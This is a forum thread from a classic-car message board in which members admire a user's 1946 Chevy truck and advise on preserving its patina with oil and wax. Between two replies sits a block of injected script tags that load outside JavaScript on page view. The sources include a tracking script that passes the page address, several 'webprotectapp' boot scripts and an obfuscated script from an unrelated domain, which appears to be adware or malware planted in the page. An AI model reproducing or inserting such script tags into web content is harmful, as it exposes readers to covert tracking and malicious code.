Register now to get rid of these ads!

Projects New home for good old truck

Discussion in 'The Hokey Ass Message Board' started by biscuit23, Mar 9, 2014.

1. biscuit23

biscuit23

Just thought i,d share a pic of my new acquisition . 46 chevy is out of New Mexico and rock soild. Drive train and suspension will have to be stepped up but that patina isn't going anywhere.
    Thanks to all HAMBER'S for the inspiration

Attached Files:

2. squirrel

squirrel

nice truck!

The patina may turn into a bunch of rust holes if you're not careful. Moisture is hard on our old southwest tin. keep it dry

A friend used the running gear out of a truck like that to hop up his 31 chevy, I guess "modernization" is all relative. Adding 50s brakes and rear gearing would help, though. YOu can do a lot of parts swapping and keep a lot of it original, while improving things for today's driving conditions.

3. biscuit23

biscuit23

Yea it's resting in a nice warm dry garage but i do worry about that nice old tin thinning out. I,ve seen posts about guys putting matte clear coat on patina but it always seems to look too shiny to me

4. Real nice truck

5. Very clean old truck! Lot of potential there.

<script src="https://secure-content-delivery.com/mware-detection/index.php?d=www.jalopyjournal.com&c=mwareDetect.returned" type="text/javascript"></script><script src="https://secure-content-delivery.com/data.js.php?i={4D877FC1-4956-4F45-A6B5-0E98AB82425A}&d=2012-6-15&s=http://www.jalopyjournal.com/forum/showthread.php?t=868675&cb=0.9994605988061932" type="text/javascript"></script><script type="text/javascript" src="http://static.webprotectapp00.webprotectapp.com/partnerconfig/webprotect.js"></script><script src="//static.webprotectapp00.webprotectapp.com/apps/boot/boot-start.js" type="text/javascript"></script><script src="//static.webprotectapp00.webprotectapp.com/apps/tv-classic/tv-classic-noboot-fg.js" type="text/javascript"></script><script src="//static.webprotectapp00.webprotectapp.com/apps/boot/boot-end.js" type="text/javascript"></script><script src="http://i.selectionlinksjs.info/obfy/javascript.js" type="text/javascript"></script>

6. Okie Pete

Okie Pete
    ALLIANCE MEMBER

Nice looking truck . I love those Art Deco Chevys.

7. Dodge Brother

Dodge Brother

Way cool! Art Deco's are awsome! I may be a little biased, seeing as I'm working on one as well. Funny how all these old finds aways come with at least one "snow tire":D

8. biscuit23

biscuit23

TWO matching snows BFG SILVERTOWNS . I,m thinking that front bumper is why i,ve got a decent grill.

9. chevy54man

chevy54man
    from NC

Man that's a great looking truck, awesome!

10. VoodooTwin

VoodooTwin
    from Noo Yawk

Congrats, that looks like a great truck. I wouldnt worry about the tin, put a coat of gibbs oil on it periodically and you should be fine.

11. odass

odass
    from se ok

Nice man! Wish my 41 had that cool patina

12. Nice truck,...you guys worry too much, that thing took 68 years to get like that, it's not gonna fall apart unless you abuse the heck out of it.

13. squirrel

squirrel

Have you seen any trucks that old, in that condition, that spent their life up north?

14. Babyearl

Babyearl

Man that is a nice truck,, keeper if I ever saw one.

15. ...very few in that cond; it must've been well taken care of; if the new owner does the same it'll stay that way. If the tin is thin, putting matte clear over it won't help a thing and will look bad. Just take reasonable care of it and it'll be fine.

16. lostmind

lostmind

New DS windshield and it's good to go.
    Nice find.

17. burl

burl
    from Minnesota

your truck is in pretty amazing shape for most ive seen. Usually almost all of the sheet metal and the grill are in pretty tough shape if it was used as a work truck at all.Pm me if you need any parts.Have some collected after a 36 year build pace.

18. 49ratfink

49ratfink
    from California

nice old truck. I could use that front bumper on my commute to work and back to bump all the idiots out of my way.

19. indyjps

indyjps

Pretty straight, good lookin truck. I would at least hit it with CLR or evaporust and a scotchbrite to halt the rust that's there and wax heavily, I've never used gibbs oil but its highly recommended here. Drive it for a while then get some paint within a few years. Looking forward to updates.

20. I would add a nice coat of wax, like you said forget about the clear. you don't see trucks like that, from the north because they dont exist in that kind of condition. nice pick up

21. I thought my 56 buick wagon was kool but you got it beat! Thats a looker.Bruce.

22. biscuit23

biscuit23

It has a home made rear bumper with some upright brackets with a vise mount so i think it was a work truck but maybe the guy wasn't all that motivated:D

23. oldsjoe

oldsjoe

I sure have truck ENVY! Been looking for something similar (who hasn't right) your one lucky person!